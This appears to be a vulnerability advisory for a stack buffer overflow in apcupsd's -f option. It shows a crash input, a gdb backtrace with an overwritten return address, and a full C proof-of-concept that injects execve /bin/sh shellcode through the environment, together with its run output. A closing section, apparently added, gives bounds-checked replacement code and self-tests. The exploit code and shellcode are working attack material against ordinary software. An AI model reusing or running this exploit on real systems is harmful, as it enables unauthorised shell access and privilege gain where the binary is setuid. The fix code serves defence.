AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Segmentation fault (core dumped)

    milkshake:~ # gdb -q /sbin/apcupsd ./core
    (no debugging symbols found)...
    Core was generated by `apcupsd -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 11, Segmentation fault.
    Reading symbols from /lib/libpthread.so.0...(no debugging symbols found)...done.
    [New Thread 1024 (LWP 1920)]
    Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
    Loaded symbols for /lib/libc.so.6
    Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
    Loaded symbols for /lib/ld-linux.so.2
    #0  0x40091a99 in vfprintf () from /lib/libc.so.6
    (gdb) bt
    #0  0x40091a99 in vfprintf () from /lib/libc.so.6
    #1  0x400a8a86 in vsprintf () from /lib/libc.so.6
    #2  0x08049b0c in strcpy ()
    #3  0x41414141 in ?? ()
    (gdb) q

    Exploit spawns a shell with the uid of the user who runs the exploit.
    Tested on SuSE 8.0.

    milkshake:~ # cat eXapcupsd.c

    /* Proof of Concept Code for buffer overflow vulnerability in apcupsd--------*/
    /* This code has been tested in SuSE 8.0 -----------------------------------*/
    /* Apcupsd isn't by default setuid root in SuSE 8.0------------------------*/
    /* This code spawns a shell with the uid of the user, who runs the exploit*/
    /* Greetings to Avicenna , Hackpimp , Murat Balaban , core.gen.tr team---*/
    /* Written by Serkan Akpolat sakpolat@gmx.net --------------------------*/

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    #define BUFSIZE 500
    #define PADDING 3

    char sc[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";   /* Murat Balaban execve /bin/sh shellcode */

    int main(void)
    {
        char *env[3] = {sc, NULL};          /* shellcode is passed via the environment */
        char buf[BUFSIZE];                  /* the over-long -f argument */
        int i, j, ret;
        int *ap;

        for (j = 0; j < PADDING; j++) {     /* alignment bytes */
            buf[j] = 'A';
        }
        ap = (int *)(buf + PADDING);
        /* guessed address of the shellcode at the top of the stack */
        ret = 0xbffffffa - strlen(sc) - strlen("/sbin/apcupsd");
        printf("Shellcode is on 0x%08x , %d junk bytes used for alignment.\n", ret, PADDING);
        printf("\t\t<--PRESS ENTER-->");
        for (i = 0; i < BUFSIZE - 8; i += 4)    /* fill the argument with the address */
            *ap++ = ret;
        *ap++ = '\0';                           /* terminate the argument string */
        getchar();
        execle("/sbin/apcupsd", "apcupsd", "-f", buf, NULL, env);
        return 0;
    }

    milkshake:~ # gcc eXapcupsd.c
    milkshake:~ # ./a.out
    Shellcode is on 0xbfffffc0 , 3 junk bytes used for alignment.
                    <--PRESS ENTER-->
    apcupsd FATAL ERROR in apcconfig.c at line 833
    Error opening configuration file (AAAÀÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿): ë~^

SOLUTION

    ?
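The advisory gives no fix, and the backtrace (strcpy, then vsprintf building the "Error opening configuration file (...)" message) shows the two places where an over-long -f argument is copied without a length check. The following is an added illustration written for this page, not the advisory's or apcupsd's own code: the unchecked copy pattern next to a bounds-checked replacement, plus an snprintf-based error message that can only truncate. The buffer sizes, function names and the sample path are assumptions; the long argument is constructed in the style of the advisory's test run.

```c
#include <stdio.h>
#include <string.h>

/* Illustrative fixed sizes; the page does not give apcupsd's real buffer sizes. */
#define CFG_PATH_MAX 128
#define ERR_MSG_MAX  256

/* The pattern the advisory describes: a caller-controlled string (here the
 * argument to -f) copied into a fixed-size buffer with no length check, so an
 * over-long argument overwrites whatever follows the buffer on the stack.
 * Kept for comparison only; nothing below calls it. */
void copy_config_path_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened replacement: the copy only happens if src, including its NUL,
 * fits in dst. memchr bounds the scan so an unterminated src is not overread.
 * Returns 0 on success, -1 if the argument is rejected. */
int set_config_path(char *dst, size_t dstlen, const char *src)
{
    const char *end;

    if (dstlen == 0)
        return -1;
    end = memchr(src, '\0', dstlen);    /* NUL must appear within dstlen bytes */
    if (end == NULL)
        return -1;                       /* too long to fit with its terminator */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Builds an error line of the kind in the advisory output with snprintf, so a
 * long path can only truncate the text, never write past msg + msglen.
 * Returns 0 if the whole message fit, 1 if it was truncated, -1 on error. */
int format_open_error(char *msg, size_t msglen, const char *path)
{
    int needed = snprintf(msg, msglen, "Error opening configuration file (%s)", path);

    if (needed < 0)
        return -1;
    return (size_t)needed >= msglen ? 1 : 0;
}

/* Constructed over-long argument in the style of the advisory's test run. */
static void fill_long_arg(char *arg, size_t len)
{
    memset(arg, 'A', len - 1);
    arg[len - 1] = '\0';
}

/* Self-checks: each returns 1 when the hardened code behaves as intended. */
int check_short_path_accepted(void)
{
    char cfg[CFG_PATH_MAX];
    const char *p = "/etc/apcupsd/apcupsd.conf";   /* assumed path */

    return set_config_path(cfg, sizeof cfg, p) == 0 && strcmp(cfg, p) == 0;
}

int check_long_path_rejected(void)
{
    char cfg[CFG_PATH_MAX];
    char arg[600];

    fill_long_arg(arg, sizeof arg);
    return set_config_path(cfg, sizeof cfg, arg) == -1;
}

int check_exact_fit_boundary(void)
{
    char small[4];

    /* "abc" plus its NUL fits in 4 bytes; "abcd" does not. */
    return set_config_path(small, sizeof small, "abc") == 0
        && strcmp(small, "abc") == 0
        && set_config_path(small, sizeof small, "abcd") == -1;
}

int check_error_message_bounded(void)
{
    char msg[ERR_MSG_MAX];
    char arg[600];

    fill_long_arg(arg, sizeof arg);
    return format_open_error(msg, sizeof msg, arg) == 1
        && strlen(msg) == ERR_MSG_MAX - 1;        /* truncated and NUL-terminated */
}

int main(int argc, char **argv)
{
    char cfg[CFG_PATH_MAX];
    char msg[ERR_MSG_MAX];
    const char *arg = argc > 1 ? argv[1] : "/etc/apcupsd/apcupsd.conf";

    if (set_config_path(cfg, sizeof cfg, arg) != 0) {
        fprintf(stderr, "configuration path too long (max %d bytes)\n", CFG_PATH_MAX - 1);
        return 1;
    }
    format_open_error(msg, sizeof msg, cfg);
    printf("%s\nchecks: %d %d %d %d\n", msg, check_short_path_accepted(),
           check_long_path_rejected(), check_exact_fit_boundary(),
           check_error_message_bounded());
    return 0;
}
```

Run it with a several-hundred-byte argument, as in the advisory's test, and the hardened version refuses the path before any copy takes place instead of crashing in vfprintf; the same length rule belongs on any other place a command-line or configuration string lands in a fixed-size buffer.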